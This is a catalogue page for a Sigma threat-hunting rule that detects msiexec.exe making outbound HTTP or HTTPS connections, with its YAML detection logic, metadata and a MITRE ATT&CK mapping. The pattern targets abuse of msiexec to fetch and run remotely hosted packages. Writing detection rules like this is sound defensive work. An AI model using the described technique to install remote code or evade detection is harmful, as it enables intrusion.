Phoenix
Sigma IntelligenceBeta
Back to Rules
Threat Huntlowtest

Msiexec.EXE Initiated Network Connection Over HTTP

Detects a network connection initiated by an "Msiexec.exe" process over port 80 or 443. Adversaries might abuse "msiexec.exe" to install and execute remotely hosted packages. Use this rule to hunt for potentially anomalous or suspicious communications.

Convert In Phoenix Studio

Open this Sigma rule in the converter with the YAML preloaded and ready for backend selection.

Launch
François HubautCreated Sun Jan 16Updated Tue Jul 168e5e38e4-5350-4c0b-895a-e872ce0dd54fwindows
Hunting Hypothesis
Log Source
WindowsNetwork Connection
ProductWindows← raw: windows
CategoryNetwork Connection← raw: network_connection

Events for outbound and inbound network connections including DNS resolution.

Detection Logic
Detection Logic1 selector
detection:
    selection:
        Initiated: 'true'
        Image|endswith: '\msiexec.exe'
        DestinationPort:
            - 80
            - 443
    condition: selection
False Positives

Likely

References
1
Resolving title…
learn.microsoft.com
2
Resolving title…
github.com
MITRE ATT&CK

Sub-techniques

T1218.007 · Msiexec

Other

detection.threat-hunting
Rule Metadata
Rule ID
8e5e38e4-5350-4c0b-895a-e872ce0dd54f
Status
test
Level
low
Type
Threat Hunt
Created
Sun Jan 16
Modified
Tue Jul 16
Author
François Hubaut
Path
rules-threat-hunting/windows/network_connection/net_connection_win_msiexec_http.yml
Raw Tags
attack.defense-evasionattack.t1218.007detection.threat-hunting
View on GitHub